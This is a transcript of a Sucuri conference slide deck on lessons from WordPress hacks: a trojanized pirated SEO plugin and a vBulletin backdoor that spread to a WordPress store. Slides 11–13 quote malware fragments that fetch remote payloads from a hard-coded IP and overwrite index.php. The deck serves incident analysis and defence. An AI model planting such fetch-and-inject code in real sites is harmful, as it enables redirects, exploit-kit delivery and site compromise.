wordpress security - learning from hacks
TRANSCRIPT
![Page 1: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/1.jpg)
Learning From Website Hacks
WordPress Security
![Page 2: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/2.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
This is me!
o Sucuri Inc.o Website Securityo Incident Handlingo Log Analysis
![Page 3: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/3.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Analyze some of the things we have seen in recent days/weeks, and better understand what we need to be doing as website owners.
Let’s Learn from Website Attacks
![Page 4: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/4.jpg)
![Page 5: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/5.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Attack Scenerios
o The Art of Phishing
o Stealing Credit Cards
![Page 6: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/6.jpg)
Scenerio Uno (One)
The art of Phishing Naive Users
![Page 7: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/7.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Attack of Opportunity
o Holiday season / Holiday spirit
o Did you say Free?
![Page 8: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/8.jpg)
![Page 9: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/9.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Red Flag[s]
<A href="http://www.[infecteddomain].com.au/wp-content/all-in-one-seo-pack%20Pro%20v2.1.zip">All in One SEO Pack V2.1 Download Link</A>
Red Alert: http://www.[infecteddomain].com.au
![Page 10: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/10.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Difference
o Pro Version?o Legit Version?
Modified file: aioseop_class.php
![Page 11: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/11.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Intent
oRedirection - porn or exploit kits
oTarget: index.php
oTaking content from here:$code_txt = 'http://91.239.15.61/o1.txt’;
oPlacing it in the files here:$index_path = $path.'/index.php';
if(file_put_contents($index_path, $code)){
![Page 12: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/12.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
How?
o Index.php payload:
oUsing curl to pull content from here:$url = http://91.239.15.61/java/google.php;
![Page 13: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/13.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Payload
oPulls content from: http://91.239.15.61/google.js - Redirection to Porn Sites
http://91.239.15.61/g.php - Exploit Kits
![Page 14: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/14.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Lesson to Be Learned
o Trust but verify sources
o This is not isolated to just plugins, it can happen to themes as well
o This is the season in which attackers prey on our need to spend $$$ and be online. Be vigilant!
o The vulnerability was the website administrator…
![Page 15: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/15.jpg)
Scenerio Dos (Two)
Got e-Commerce? Leverage 3rd-party CMS applications in your
stack?
![Page 16: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/16.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Got e-Commerce?
o Business owners <3 E-commerce
o CMS extensibility = WooCommerce o Quick setup of payment collection systems for
goods
o Awesome, right?
![Page 17: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/17.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Big Target
o Credit Card = Cha-Ching
o Used/shared/sold underground
o Impact is catastrophico Blacklistingo Ban
o No more cash flow! No more Trust!
![Page 18: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/18.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Cross-contamination
Simple concept in which your website is attacked and infected by a neighboring site in the same
environment
![Page 19: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/19.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
vBulletin
o Popular CMS Application for Forums
o WordPress + vBulletin Configurations Common
![Page 20: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/20.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Scenerio
o WordPress: Main website | Blog | e-Commerce
o vBulletin: Forum
o 1 Server
![Page 21: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/21.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Payload
Found here: /wp-admin/includes/list.php
![Page 22: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/22.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
How?
o It’s about the journey folks…
![Page 23: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/23.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Scenerio
o list.php?
o shop.txt?
![Page 24: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/24.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
That’s Interesting
/forum/ajax.php?edit=
![Page 25: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/25.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
vBulletin Plugin
o Backdoor shell was installed into vBulletin giving the attacker the tools they needed to attack the WordPress installation.
![Page 26: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/26.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Dump of Users
![Page 27: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/27.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Attack Vector
o Access Control
![Page 28: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/28.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Lessons to be Learned
o Attackers are smart – surprise!!!
o Cross-contamination is a real threat today!
o Must be diligent across our stack!
o Isolate applications if possible.
![Page 29: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/29.jpg)
What can you do?
Lets get proactive!
![Page 30: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/30.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
None of the security plugins out there would have prevented either of these attacks. So much
for all those hardening tips..
Harsh Reality
![Page 31: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/31.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Two Important Vectors
o Access controlo Within your control…
o Software vulnerabilitieso Not so much…
![Page 32: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/32.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
• There is no single cure
• Layered Defenses
• Combination of tools and actions– Combine: Protection and Detection
Defense in Depth
![Page 33: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/33.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Access Control
o Google Authenticator – 2FA
o http://wordpress.org/plugins/google-authenticator/
o Duo Security – 2FA
o http://wordpress.org/plugins/duo-wordpress/
o Login Secure Solutions – Policy / Enforcement
o http://wordpress.org/plugins/login-security-solution/
o Sucuri CloudProxy / Detection / Remedation - Complete Website Security
o http://sucuri.net/signup
![Page 34: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/34.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Software Vulnerabilities
o Trusted Sourceso Start with the repo and established communitieso If you’re not a developer this is going to be beyond your
reach mostly
o Web Application Firewall (WAF) Pluginso Highly ineffective, evading and bypassing is easy o Cause Denial of Service attacks
o SaaS based Web Application Firewall (WAF) more effective!o Sucuri CloudProxy WAF
![Page 35: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/35.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
• Know what is going on with your site– Integrity Checks– Logging in / Logging out– Changes being made
• More important than half the hardening tips you read on line today
• Options:– WP Security Audit log http
://wordpress.org/plugins/wp-security-audit-log/
– Sucuri Premium Pluginhttp://wordpress.sucuri.net
Auditing
![Page 36: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/36.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
If all else fails…
o Be sure you have backups… o VaultPress – WordPress Siteso Sucuri Backups – WordPress and Everything else
o SaaS based Backups more effective!
![Page 37: WordPress Security - Learning From Hacks](https://reader035.vdocuments.mx/reader035/viewer/2022062307/554bcc57b4c905ac708b461b/html5/thumbnails/37.jpg)
Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
Tony Perez @perezbox | @sucuri_security
[email protected]#wordsesh